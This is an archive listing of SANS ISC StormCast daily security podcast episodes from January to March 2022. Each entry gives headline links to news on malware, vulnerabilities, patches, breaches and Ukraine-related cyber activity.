Java Springtime Confusion: What Vulnerability are We Talking About https://isc.sans.edu/forums/diary/Java+Springtime+Confusion+What+Vulnerability+are+We+Talking+About/28500/
Quickie: Parsing XLSB Documents https://isc.sans.edu/forums/diary/Quickie+Parsing+XLSB+Documents/28496/
Pwning 3CX Phone Management Backends from the Internet https://medium.com/@frycos/pwning-3cx-phone-management-backends-from-the-internet-d0096339dd88
3/31/2022 (5 minutes, 56 seconds)
Episode Artwork

ISC StormCast for Wednesday, March 30th, 2022

More Fake/Typosquatting Twitter Accounts Asking for Ukraine Cryptocurrency Donations https://isc.sans.edu/forums/diary/More+FakeTyposquatting+Twitter+Accounts+Asking+for+Ukraine+Crytocurrency+Donations/28492/
Mitigating Attacks Against Uninterruptible Power Supply Devices https://www.cisa.gov/sites/default/files/publications/CISA-DOE_Insights-Mitigating_Vulnerabilities_Affecting_Uninterruptible_Power_Supply_Devices_Mar_29.pdf
MFA Bypass Attacks https://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html
Google Advertises Mars Stealer https://blog.morphisec.com/threat-research-mars-stealer
Hackers Gaining Power of Subpoena Via Fake "Emergency Data Requests" https://krebsonsecurity.com/2022/03/hackers-gaining-power-of-subpoena-via-fake-emergency-data-requests/
3/30/2022 (6 minutes, 44 seconds)
Episode Artwork

ISC StormCast for Tuesday, March 29th, 2022

BGP Hijacking of Twitter Prefix by RTComm.ru https://isc.sans.edu/forums/diary/BGP+Hijacking+of+Twitter+Prefix+by+RTCommru/28488/
DDoS Against Sites in Ukraine https://www.bleepingcomputer.com/news/security/hacked-wordpress-sites-force-visitors-to-ddos-ukrainian-targets/
Sophos Patches https://www.sophos.com/en-us/security-advisories/sophos-sa-20220325-sfos-rce
Sonicwall Patches https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0003
opnsense CARP protocol routing error https://medium.com/sensorfu/firewall-bypass-with-carp-in-packet-filter-c4ed70fb7dd7
3/29/2022 (6 minutes, 4 seconds)
Episode Artwork

ISC StormCast for Monday, March 28th, 2022

XLSB Files Because Binary is Stealthier Than XML https://isc.sans.edu/forums/diary/XLSB+Files+Because+Binary+is+Stealthier+Than+XML/28476/
Dirty Pipe Container Escape PoC https://www.datadoghq.com/blog/engineering/dirty-pipe-container-escape-poc/
PHP filter_var Shenanigans https://pwning.systems/posts/php_filter_var_shenanigans/
OpenBSD slaacd vuln https://blog.quarkslab.com/heap-overflow-in-openbsds-slaacd-via-router-advertisement.html
Google Chrome Update https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html
3/28/2022 (6 minutes, 16 seconds)
Episode Artwork

ISC StormCast for Friday, March 25th, 2022

Malware Delivered Through Free Sharing Tool https://isc.sans.edu/forums/diary/Malware+Delivered+Through+Free+Sharing+Tool/28474/
Western Digital PR4100 NAS Vulnerability https://research.nccgroup.com/2022/03/24/remote-code-execution-on-western-digital-pr4100-nas-cve-2022-23121/
Crypto malware in patched wallets targeting Android and iOS devices https://www.welivesecurity.com/2022/03/24/crypto-malware-patched-wallets-targeting-android-ios-devices/
Lapsus$ Arrest https://www.bbc.com/news/technology-60864283 https://www.bloomberg.com/news/articles/2022-03-23/teen-suspected-by-cyber-researchers-of-being-lapsus-mastermind?sref=ylv224K8
Four Russian Government Employees Charged in Two Historical Hacking Campaigns Targeting Critical Infrastructure Worldwide https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical
3/25/2022 (5 minutes, 56 seconds)
Episode Artwork

ISC StormCast for Thursday, March 24th, 2022

Mars Stealer https://isc.sans.edu/forums/diary/Arkei+Variants+From+Vidar+to+Mars+Stealer/28468/
Okta Update https://www.okta.com/blog/2022/03/oktas-investigation-of-the-january-2022-compromise/
Microsoft Lapsus$ Update https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/
npm Attack Targeting Azure Developers https://jfrog.com/blog/large-scale-npm-attack-targets-azure-developers-with-malicious-packages/
3/24/2022 (6 minutes, 18 seconds)
Episode Artwork

ISC StormCast for Wednesday, March 23rd, 2022

Statement by President Biden: What you need to do (or not do) https://isc.sans.edu/forums/diary/Statement+by+President+Biden+What+you+need+to+do+or+not+do/28466/
ASUS Cyclops Blink Advisory https://www.asus.com/content/ASUS-Product-Security-Advisory/
HP Vulnerabilities https://support.hp.com/us-en/document/ish_5948778-5949142-16/hpsbpi03780
Sophos UTM Updates https://www.sophos.com/en-us/security-advisories/sophos-sa-20220321-utm-9710
MacOS GIMMICK Malware https://www.volexity.com/blog/2022/03/22/storm-cloud-on-the-horizon-gimmick-malware-strikes-at-macos/
Okta Breached By Lapsus$ https://www.okta.com/blog/2022/03/updated-okta-statement-on-lapsus/ https://twitter.com/BillDemirkapi/status/1506107157124722690
3/23/2022 (7 minutes, 18 seconds)
Episode Artwork

ISC StormCast for Tuesday, March 22nd, 2022

Maldoc Cleaned by Anti-Virus https://isc.sans.edu/forums/diary/Maldoc+Cleaned+by+AntiVirus/28460/
Serpent, No Swiping! New Backdoor Targets French Entities with Unique Attack Chain https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain
IBM Spectrum Protect Update https://www.ibm.com/support/pages/node/6564745
Lapsus$ May have Breached Microsoft https://www.theregister.com/2022/03/21/microsoft_lapsus_breach_probe/
Statement by President Biden on our Nation's Cybersecurity https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/21/statement-by-president-biden-on-our-nations-cybersecurity/
3/22/2022 (7 minutes, 35 seconds)
Episode Artwork

ISC StormCast for Monday, March 21st, 2022

Scans for Movable Type Vulnerability (CVE-2021-20837) https://isc.sans.edu/forums/diary/Scans+for+Movable+Type+Vulnerability+CVE202120837/28454/
SolarWinds Advisory: Unauthenticated Access in Web Help Desk (12.7.5) https://isc.sans.edu/forums/diary/SolarWinds+Advisory+Unauthenticated+Access+in+Web+Help+Desk+1275/28456/
MGLNDD_* Scans https://isc.sans.edu/forums/diary/MGLNDD+Scans/28458/
CAPTCHA Phishing https://www.avanan.com/blog/using-captcha-forms-to-bypass-filters
Browser in the Browser Templates https://mrd0x.com/browser-in-the-browser-phishing-attack/
3/21/2022 (6 minutes, 6 seconds)
Episode Artwork

ISC StormCast for Friday, March 18th, 2022

npm Package Sabotaged for Belarus/Russian Users https://snyk.io/blog/peacenotwar-malicious-npm-node-ipc-package-vulnerability/
President Zelensky Deepfakes https://twitter.com/ngleicher/status/1504186935291506693
ATM Rootkit https://www.mandiant.com/resources/unc2891-overview
Scanner for Backdoored Mikrotik Routers https://github.com/microsoft/routeros-scanner
SANS.edu Student: Ron Grohman; Network Access Control and ICS: A Practical Guide https://www.sans.edu/cyber-research/network-access-control-and-ics-a-practical-guide/
3/18/2022 (14 minutes, 33 seconds)
Episode Artwork

ISC StormCast for Thursday, March 17th, 2022

Qakbot Infection With Cobalt Strike and VNC Activity https://isc.sans.edu/forums/diary/Qakbot+infection+with+Cobalt+Strike+and+VNC+activity/28448/
Gh0stCringe RAT Being Distributed to Vulnerable Database Servers https://asec.ahnlab.com/en/32572/
dompdf 0 day https://positive.security/blog/dompdf-rce
OpenSSL DoS Vulnerability https://www.openssl.org/news/secadv/20220315.txt
3/17/2022 (5 minutes, 32 seconds)
Episode Artwork

ISC StormCast for Wednesday, March 16th, 2022

Clean Binaries with Suspicious Behaviour https://isc.sans.edu/forums/diary/Clean+Binaries+with+Suspicious+Behaviour/28444/
Misconfigured Multi-Factor Authentication Abused https://www.cisa.gov/uscert/ncas/alerts/aa22-074a
German Office of Information Security Warns Kaspersky Users https://www.bsi.bund.de/DE/Service-Navi/Presse/Pressemitteilungen/Presse2022/220315_Kaspersky-Warnung.html
Caddy Wiper Targeting Ukraine https://www.welivesecurity.com/2022/03/15/caddywiper-new-wiper-malware-discovered-ukraine/
Fake Antivirus Targeting Ukraine https://twitter.com/malwrhunterteam/status/1502302718140035080
B1txor20 DNS Tunnel Backdoor https://blog.netlab.360.com/b1txor20-use-of-dns-tunneling_en/
3/16/2022 (5 minutes, 6 seconds)
Episode Artwork

ISC StormCast for Tuesday, March 15th, 2022

Apple Updates Everything https://isc.sans.edu/forums/diary/Apple+Updates+Everything+MacOS+123+XCode+133+tvOS+154+watchOS+85+iPadOS+154+and+more/28438/
Look Alike Accounts Used in Ukraine Donation Scam Impersonating Olena Zelenska https://isc.sans.edu/forums/diary/Look+Alike+Accounts+Used+in+Ukraine+Donation+Scam+impersonating+Olena+Zelenska/28440/
Curl on Windows https://isc.sans.edu/forums/diary/Curl+on+Windows/28436/
Veeam Vulnerabilities https://www.veeam.com/kb4288
Linux Netfilter Privilege Escalation https://nickgregory.me/linux/security/2022/03/12/cve-2022-25636/
3/15/2022 (5 minutes, 40 seconds)
Episode Artwork

ISC StormCast for Monday, March 14th, 2022

Malware Using WebSockets For C&C https://isc.sans.edu/forums/diary/Keep+an+Eye+on+WebSockets/28430/
Raccoon Stealer leverages Telegram https://decoded.avast.io/vladimirmartyanov/raccoon-stealer-trash-panda-abuses-telegram/
USAHERDS Hack https://www.wired.com/story/china-apt41-hacking-usaherds-log4j/
YARA 4.2.0 Released https://isc.sans.edu/forums/diary/YARA+420+Released/28432/
3/14/2022 (5 minutes, 27 seconds)
Episode Artwork

ISC StormCast for Friday, March 11th, 2022

Credential Leaks on Virustotal https://isc.sans.edu/forums/diary/Credentials+Leaks+on+VirusTotal/28426/
GPS Issues Around Finnish-Russian Border https://www.straitstimes.com/world/europe/finland-detects-gps-disturbance-near-russias-kaliningrad
Russia Considering Internal Certificate Authority https://www.gosuslugi.ru/tls https://www.bleepingcomputer.com/news/security/russia-creates-its-own-tls-certificate-authority-to-bypass-sanctions/
New Spectre Variant https://www.vusec.net/projects/bhi-spectre-bhb/
Package Manager Vulnerabilities (yarn, pip, composer...) https://blog.sonarsource.com/securing-developer-tools-package-managers
3/11/2022 (5 minutes, 32 seconds)
Episode Artwork

ISC StormCast for Thursday, March 10th, 2022

Infostealer in a Batch File https://isc.sans.edu/forums/diary/Infostealer+in+a+Batch+File/28422/
TP240PhoneHome reflection/amplification DDoS Attack Vector https://blog.cloudflare.com/cve-2022-26143/
Malware Disguises as Pro Ukrainian Cybertools https://blog.talosintelligence.com/2022/03/threat-advisory-cybercriminals.html#more
Russian Government Sites Hacked in Supply Chain Attack https://www.bleepingcomputer.com/news/security/russian-government-sites-hacked-in-supply-chain-attack/
Third Party Vulnerabilities in RUGGEDCOM ROS https://cert-portal.siemens.com/productcert/pdf/ssa-256353.pdf
Adobe Bulletins https://helpx.adobe.com/security/security-bulletin.html
3/10/2022 (6 minutes, 15 seconds)
Episode Artwork

ISC StormCast for Wednesday, March 9th, 2022

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+March+2022+Patch+Tuesday/28418/
Critical APC UPS Vulnerability https://www.armis.com/research/tlstorm/
Vulnerabilities in Firmware Affecting HP Devices https://www.binarly.io/news/BinarlyDiscovers16NewHighImpactVulnerabilitiesinFirmwareAffectingHPEnterpriseDevices/index.html
3/9/2022 (5 minutes, 32 seconds)
Episode Artwork

ISC StormCast for Tuesday, March 8th, 2022

Ukraine Scam Followup https://isc.sans.edu/forums/diary/No+Bitcoin+No+Problem+Follow+Up+to+Last+Weeks+Donation+Scam/28412/
Dirty Pipe Linux Vulnerability https://dirtypipe.cm4all.com
Mozilla Firefox and Thunderbird Vulnerability https://www.mozilla.org/en-US/security/advisories/mfsa2022-09/
Azure AutoWarp https://orca.security/resources/blog/autowarp-microsoft-azure-automation-service-vulnerability/
Terramaster TOS Vulnerability https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/ https://forum.terra-master.com/en/viewtopic.php?f=28&t=3030
3/7/2022 (5 minutes, 46 seconds)
Episode Artwork

ISC StormCast for Monday, March 7th, 2022

Ukraine Donation Scam https://isc.sans.edu/forums/diary/Scam+EMail+Impersonating+Red+Cross/28404/
Cogent Disconnects Russia https://www.washingtonpost.com/technology/2022/03/04/russia-ukraine-internet-cogent-cutoff/
Russia DDoS Lists https://safe-surf.ru/upload/ALRT/proxies.txt https://safe-surf.ru/upload/ALRT/referer_http_header.txt
NVidia Stolen Certificates https://www.theregister.com/2022/03/05/nvidia_stolen_certificate/ https://twitter.com/cyb3rops/status/1499514240008437762
GitLab Vulnerabilities https://about.gitlab.com/releases/2022/02/25/critical-security-release-gitlab-14-8-2-released/#unauthenticated-user-enumeration-on-graphql-api
Cisco Patches https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-expressway-filewrite-87Q5YRk
3/7/2022 (6 minutes, 44 seconds)
Episode Artwork

ISC StormCast for Friday, March 4th, 2022

Attackers Search For Exposed "LuCI" Folders https://isc.sans.edu/diary/28400
Alexa Versus Alexa https://arxiv.org/abs/2202.08619
Bypassing Google Cloud Armor https://kloudle.com/blog/piercing-the-cloud-armor-the-8kb-bypass-in-google-cloud-platform-waf
Ukraine Updates https://www.golem.de/news/ausfall-angriff-auf-ka-sat-satellit-ueber-gatewaystation-in-ukraine-2203-163614.html https://www.crowdstrike.com/blog/how-to-decrypt-the-partyticket-ransomware-targeting-ukraine/ https://www.bleepingcomputer.com/news/security/ukraine-says-local-govt-sites-hacked-to-push-fake-capitulation-news/
3/4/2022 (7 minutes, 7 seconds)
Episode Artwork

ISC StormCast for Thursday, March 3rd, 2022

The More Often Something is Repeated, the More True it Becomes https://isc.sans.edu/forums/diary/The+More+Often+Something+is+Repeated+the+More+True+It+Becomes+Dealing+with+Social+Media/28396/
Fortinet Bug https://www.fortiguard.com/psirt/FG-IR-21-028
IBM Updates https://www.ibm.com/blogs/psirt/
Google Updates https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop.html
Conti Ransomware Leak https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/
Middle Box DDoS Attacks https://www.akamai.com/blog/security/tcp-middlebox-reflection
3/3/2022 (5 minutes, 28 seconds)
Episode Artwork

ISC StormCast for Wednesday, March 2nd, 2022

Geoblocking when you can't Geoblock https://isc.sans.edu/forums/diary/Geoblocking+when+you+cant+Geoblock/28392/
IsaacWiper and HermeticWizard: New wiper and worm targeting Ukraine https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/
Memory Corruption Vulnerabilities in PJSIP https://jfrog.com/blog/jfrog-discloses-5-memory-corruption-vulnerabilities-in-pjsip-a-popular-multimedia-library/
Okta Patch for Advanced Server Access Client https://trust.okta.com/security-advisories/okta-advanced-server-access-client-cve-2022-24295
ViaSat Outage https://www.reuters.com/business/aerospace-defense/satellite-firm-viasat-probes-suspected-cyberattack-ukraine-elsewhere-2022-02-28/
3/2/2022 (6 minutes, 2 seconds)
Episode Artwork

ISC StormCast for Tuesday, March 1st, 2022

PHP Patches Code Injection Flaw https://nvd.nist.gov/vuln/detail/CVE-2021-21708 https://bugs.php.net/bug.php?id=81708
Mozilla VPN Local Privilege Escalation https://www.mozilla.org/en-US/security/advisories/mfsa2022-08/
Google Captcha Breaking https://east-ee.com/2022/02/28/1367/
Samsung Encryption Vulnerability https://eprint.iacr.org/2022/208.pdf
tshark Multiple IPs https://isc.sans.edu/forums/diary/TShark+Multiple+IP+Addresses/28386/
3/1/2022, 6 minutes, 46 seconds

ISC StormCast for Monday, February 28th, 2022

Ukraine Update https://www.bleepingcomputer.com/news/security/ransomware-gangs-hackers-pick-sides-over-russia-invading-ukraine/ https://ddosecrets.com/wiki/Tetraedr https://twitter.com/YourAnonOne/status/1496965766435926039 https://www.wired.com/story/ukraine-it-army-russia-war-cyberattacks-ddos/
Odd Windows Behaviour with Fixed Addresses https://isc.sans.edu/forums/diary/Windows+Fixed+IPv4+Addresses+and+APIPA/28380/
Using Snort IDS Rules in NetWitness Packet Decoder https://isc.sans.edu/forums/diary/Using+Snort+IDS+Rules+with+NetWitness+PacketDecoder/28382/
NVidia Breach https://www.bloomberg.com/news/articles/2022-02-25/nvidia-is-investigating-cyber-attack-but-business-uninterrupted
Windows 11 Reset Not Removing All Data https://docs.microsoft.com/en-us/windows/release-health/status-windows-11-21h2#2783msgdesc
2/28/2022, 5 minutes, 35 seconds

ISC StormCast for Friday, February 25th, 2022

Ukraine Update: Webcast https://www.sans.org/webcasts/russian-cyber-attack-escalation-in-ukraine/
Other Ukraine Related Stories https://isc.sans.edu/forums/diary/Ukraine+Russia+Situation+From+a+Domain+Names+Perspective/28376/ https://detection.watchguard.com
Zabbix Vulnerability Exploited https://www.cisa.gov/uscert/ncas/current-activity/2022/02/22/cisa-adds-two-known-exploited-vulnerabilities-catalog https://support.zabbix.com/browse/ZBX-20350
Asustor Victim of Deadbolt Ransomware https://forum.asustor.com/viewtopic.php?f=45&t=12630
Firepower Rule Update Failure After March 5th 2022 https://www.cisco.com/c/en/us/support/docs/field-notices/723/fn72332.html?emailclick=CNSemail
Social Media Takeover Malware Distributed Via Microsoft App Store https://research.checkpoint.com/2022/new-malware-capable-of-controlling-social-media-accounts-infects-5000-machines-and-is-actively-being-distributed-via-gaming-applications-on-microsofts-official-store/
2/25/2022, 6 minutes, 42 seconds

ISC StormCast for Thursday, February 24th, 2022

New Sandworm Malware Cyclops Blink Replaces VPNFilter https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter
Wiper Malware Seen Deployed Against Targets in the Ukraine https://twitter.com/juanandres_gs/status/1496581710368358400 https://twitter.com/ESETresearch/status/1496581903205511181
The Rise and Fall of log4shell https://isc.sans.edu/forums/diary/The+Rise+and+Fall+of+log4shell/28372/
pfsense authenticated RCE https://www.shielder.it/advisories/pfsense-remote-command-execution/
BVP47 Backdoor https://www.pangulab.cn/files/The_Bvp47_a_top-tier_backdoor_of_us_nsa_equation_group.en.pdf
2/24/2022, 6 minutes, 58 seconds

ISC StormCast for Wednesday, February 23rd, 2022

A Good Old Equation Editor Vulnerability Delivering Malware https://www.welivesecurity.com/2022/02/22/teenage-cybercrime-stop-kids-wrong-path/
Horde Webmail 5.2.22 - Account Takeover via Email https://blog.sonarsource.com/horde-webmail-account-takeover-via-email
NoVNC Phishing https://mrd0x.com/bypass-2fa-using-novnc/
2/23/2022, 6 minutes, 30 seconds

ISC StormCast for Tuesday, February 22nd, 2022

Sending an Email to an IPv4 Address https://isc.sans.edu/forums/diary/Sending+an+Email+to+an+IPv4+Address/28362/
SMS Phone-Verified Account Services https://www.trendmicro.com/en_us/research/22/b/sms-pva-services-use-of-infected-android-phones-reveals-flaws-in-sms-verification.html
Xenomorph Android Banking Trojan https://www.threatfabric.com/blogs/xenomorph-a-newly-hatched-banking-trojan.html
Modified CryptBot Infostealer Going After Crypto Wallets https://asec.ahnlab.com/en/31802/
Clarification for Adobe Magento Vulnerabilities https://helpx.adobe.com/security/products/magento/apsb22-12.html
2/22/2022, 5 minutes, 55 seconds

ISC StormCast for Monday, February 21st, 2022

Remcos RAT Delivered Through Double Compressed Archive https://isc.sans.edu/forums/diary/Remcos+RAT+Delivered+Through+Double+Compressed+Archive/28354/
Cassandra User-Defined Functions Remote Code Execution https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/
Apple T2 Weakness https://www.forensicfocus.com/news/passware-kit-forensic-t2-add-on-the-first-password-recovery-tool-for-macs-with-t2-chips/
snap privilege escalation https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt
2/21/2022, 5 minutes, 4 seconds

ISC StormCast for Friday, February 18th, 2022

Hackers Attach Malicious .exe Files to Teams Conversations https://www.avanan.com/blog/hackers-attach-malicious-.exe-files-to-teams-conversations
Thunderbird Patches https://www.mozilla.org/en-US/security/advisories/mfsa2022-07/
Cisco Secure Email Gateway Update https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-esa-dos-MxZvGtgU
GitHub Code Scanning Finds More Vulnerabilities Using Machine Learning https://github.blog/2022-02-17-code-scanning-finds-vulnerabilities-using-machine-learning/
Exploit for Magento Vulnerability (CVE-2022-24086) Available https://twitter.com/ptswarm/status/1494240197915123713
More Packet Fu With Zeek https://isc.sans.edu/forums/diary/More+packet+fu+with+zeek/28350/
2/18/2022, 5 minutes, 17 seconds

ISC StormCast for Thursday, February 17th, 2022

Astaroth (Guildma) Infection https://isc.sans.edu/forums/diary/Astaroth+Guildma+infection/28346/
Atlassian Jira Updates https://jira.atlassian.com/browse/CONFSERVER-66550
VMWare Updates https://www.vmware.com/security/advisories/VMSA-2022-0004.html
FBI Warns of BEC Using Virtual Meeting Platforms https://www.ic3.gov/Media/Y2022/PSA220216
2/17/2022, 5 minutes, 31 seconds

ISC StormCast for Wednesday, February 16th, 2022

Who Are Those Bots? https://isc.sans.edu/forums/diary/Who+Are+Those+Bots/28342/
SquirrelWaffle Adds a Twist of Fraud to Exchange Server Malspamming https://news.sophos.com/en-us/2022/02/15/vulnerable-exchange-server-hit-by-squirrelwaffle-and-financial-fraud/
Details About Western Digital MyCloud Flaw https://www.iot-inspector.com/blog/advisory-western-digital-my-cloud-pro-series-pr4100-rce/
Nooie Baby Monitor Vulnerabilities https://www.bitdefender.com/blog/labs/vulnerabilities-identified-in-nooie-baby-monitor/
2/16/2022, 5 minutes, 42 seconds

ISC StormCast for Tuesday, February 15th, 2022

Reminder: Decoding TLS Client Hello to Non TLS Servers https://isc.sans.edu/forums/diary/Reminder+Decoding+TLS+Client+Hellos+to+non+TLS+servers/28338/
Magento 2 Critical Vulnerability https://sansec.io/research/magento-2-cve-2022-24086
BigSur/Catalina Mystery Update https://support.apple.com/en-us/HT201222
MacOS Monterey Patch and Microsoft Defender https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/mde-apparently-blocks-macos-monterey-12-1-12-2-upgrades/m-p/3078793
Google Chrome 0-Day Fixed https://chromereleases.googleblog.com/2022/02/stable-channel-update-for-desktop_14.html
Moxa MXview Vulnerabilities and Patch https://www.claroty.com/2022/02/10/blog-research-securing-network-management-systems-moxa-mxview/
2/15/2022, 5 minutes, 40 seconds

ISC StormCast for Monday, February 14th, 2022

CinaRAT Delivered Through HTML ID Attributes https://isc.sans.edu/forums/diary/CinaRAT+Delivered+Through+HTML+ID+Attributes/28330/
Windows Defender ASR Blocks LSASS Credential Stealing https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide#block-credential-stealing-from-the-windows-local-security-authority-subsystem
Brave Blocking Credential Leaking Extension https://www.theregister.com/2022/02/12/facebook_god_mode/
Project Zero Summary of Zero Day Bugs https://googleprojectzero.blogspot.com/2022/02/a-walk-through-project-zero-metrics.html
2/14/2022, 5 minutes, 3 seconds

ISC StormCast for Friday, February 11th, 2022

iOS/iPadOS/macOS/Safari 0-Day Vulnerability in WebKit https://support.apple.com/en-us/HT213091
Zyxel Network Storage Devices Hunted By Mirai Variant https://isc.sans.edu/forums/diary/Zyxel+Network+Storage+Devices+Hunted+By+Mirai+Variant/28324/
WMIC Removal https://docs.microsoft.com/en-us/windows/deployment/planning/windows-10-deprecated-features
Zoom Uses Microphone after Meeting is Over https://community.zoom.com/t5/Meetings/Why-is-the-Zoom-app-listening-on-my-microphone-when-not-in-a/td-p/29019
Evidence Planted to Implicate Innocent Activists https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/
2/11/2022, 6 minutes, 2 seconds

ISC StormCast for Thursday, February 10th, 2022

Example of Cobalt Strike from Emotet Infection https://isc.sans.edu/forums/diary/Example+of+Cobalt+Strike+from+Emotet+infection/28318/
Adobe Patches https://helpx.adobe.com/security/security-bulletin.html
Intel Updates https://www.intel.com/content/www/us/en/security-center/default.html
NaturalFreshMall: A Mass Store Attack https://sansec.io/research/naturalfreshmall-mass-hack
2/10/2022, 6 minutes, 23 seconds

ISC StormCast for Wednesday, February 9th, 2022

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+February+2022+Patch+Tuesday/28316/
Google Cloud Virtual Machine Threat Detection https://cloud.google.com/security-command-center/docs/concepts-vm-threat-detection-overview
Android Patches https://source.android.com/security/bulletin/2022-02-01
SAP Patches https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+February+2022
Podcast 13 Year Anniversary https://isc.sans.edu/podcastdetail.html?id=25
2/9/2022, 5 minutes, 46 seconds

ISC StormCast for Tuesday, February 8th, 2022

web3 phishing via self-customizing landing pages https://isc.sans.edu/forums/diary/web3+phishing+via+selfcustomizing+landing+pages/28312/
MSFT Blocking Office VBA Macros https://www.theverge.com/2022/2/7/22922032/microsoft-block-office-vba-macros-default-change https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805
Acronis True Image Update https://security-advisory.acronis.com/updates/UPD-2201-f76f-838c
Lockbit 2 IoCs https://www.ic3.gov/Media/News/2022/220204.pdf
2/8/2022, 5 minutes, 41 seconds

ISC StormCast for Monday, February 7th, 2022

Intuit warns of new phishing scams https://security.intuit.com/security-notices
IRS working with ID.me https://www.irs.gov/newsroom/new-identity-verification-process-to-access-certain-irs-online-tools-and-services
Argo CD Vulnerability https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/ https://github.com/argoproj/argo-cd/security/advisories/GHSA-63qx-x74g-jcr7
Thermal Imaging of PoE Devices https://isc.sans.edu/forums/diary/Power+over+Ethernet+and+Thermal+Imaging/28308/
2/7/2022, 6 minutes, 16 seconds

ISC StormCast for Friday, February 4th, 2022

Attack Surface Detection https://isc.sans.edu/forums/diary/Keeping+Track+of+Your+Attack+Surface+for+Cheap/28304/
MFA News https://www.proofpoint.com/us/blog/threat-insight/mfa-psa-oh-my https://news.microsoft.com/wp-content/uploads/prod/sites/626/2022/02/Cyber-Signals-E-1.pdf
Zimbra Webmail 0-Day Exploited https://www.volexity.com/blog/2022/02/03/operation-emailthief-active-exploitation-of-zero-day-xss-vulnerability-in-zimbra/
Cisco RV Series Routers Vulnerabilities https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D
2/4/2022, 5 minutes, 20 seconds

ISC StormCast for Thursday, February 3rd, 2022

Finding elFinder: Who is looking for your files? https://isc.sans.edu/forums/diary/Finding+elFinder+Who+is+looking+for+your+files/28300/
IBM Spectrum Protect Plus Container Backup Vulnerabilities https://www.ibm.com/support/pages/node/6540860 https://www.ibm.com/support/pages/node/6552188
Microsoft Update Connectivity https://techcommunity.microsoft.com/t5/windows-it-pro-blog/achieve-better-patch-compliance-with-update-connectivity-data/ba-p/3073356
UEFI Bios Vulnerabilities https://www.insyde.com/security-pledge
2/3/2022, 5 minutes, 31 seconds

ISC StormCast for Wednesday, February 2nd, 2022

Windows Privilege Escalation Exploit CVE-2022-21882 https://github.com/KaLendsi/CVE-2022-21882
Fingerprinting Devices Via GPU https://arxiv.org/pdf/2201.09956.pdf
SolarMarker Campaign used novel registry changes to establish persistence https://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/
Fake Job Ads https://www.ic3.gov/Media/Y2022/PSA220201
Automation is Nice But Don't Replace Your Knowledge https://isc.sans.edu/forums/diary/Automation+is+Nice+But+Dont+Replace+Your+Knowledge/28296/
2/2/2022, 5 minutes, 59 seconds

ISC StormCast for Tuesday, February 1st, 2022

Be Careful with RPMSG Files https://isc.sans.edu/forums/diary/Be+careful+with+RPMSG+files/28292/
QNAP Auto Update Clarification https://www.qnap.com/en/security-news/2022/descriptions-and-explanations-of-the-qts-quts-hero-recommended-version-feature
Samba Vulnerability https://kb.cert.org/vuls/id/119678
Exposed Datacenter Management https://www.bleepingcomputer.com/news/security/over-20-000-data-center-management-systems-exposed-to-hackers/
Expat Vulnerability https://github.com/libexpat/libexpat/blob/master/expat/Changes
2/1/2022, 5 minutes, 18 seconds

ISC StormCast for Monday, January 31st, 2022

Malicious ISO Embedded in an HTML Page https://isc.sans.edu/forums/diary/Malicious+ISO+Embedded+in+an+HTML+Page/28282/
YARA Console Module https://isc.sans.edu/forums/diary/YARAs+Console+Module/28288/
Attackers Attaching Devices to Azure AD https://www.microsoft.com/security/blog/2022/01/26/evolved-phishing-device-registration-trick-adds-to-phishers-toolbox-for-victims-without-mfa/
QNAP Forced Updates https://www.reddit.com/r/qnap/comments/sdsf02/i_just_suffered_what_i_believe_to_be_a_forced/huhfmjc/
1/31/2022, 6 minutes, 12 seconds

ISC StormCast for Friday, January 28th, 2022

Technical Analysis of CVE-2022-22583 https://perception-point.io/technical-analysis-of-cve-2022-22583-bypassing-macos-system-integrity-protection/ https://isc.sans.edu/forums/diary/Apple+Patches+Everything/28280/
Little Snitch Firewall Bypass https://rhinosecuritylabs.com/network-security/bypassing-little-snitch-firewall/
DazzleSpy Malware https://www.welivesecurity.com/2022/01/25/watering-hole-deploys-new-macos-malware-dazzlespy-asia/
Geoffrey Parker: Building an Intelligent, Automated Tiered Phishing System https://www.sans.edu/cyber-research/building-an-intelligent-automated-tiered-phishing-system-matching-the-message-level-to-user-ability/
1/28/2022, 16 minutes

ISC StormCast for Thursday, January 27th, 2022

Over 20 Thousand Servers Have Their iLO Interfaces Exposed to the Internet https://isc.sans.edu/forums/diary/Over+20+thousand+servers+have+their+iLO+interfaces+exposed+to+the+internet+many+with+outdated+and+vulnerable+versions+of+FW/28276/
Apple Patches and Exploits https://support.apple.com/en-us/HT201222 https://www.ryanpickren.com/safari-uxss
Let's Encrypt Fixes Problems and Revokes Certificates https://community.letsencrypt.org/t/changes-to-tls-alpn-01-challenge-validation/170427
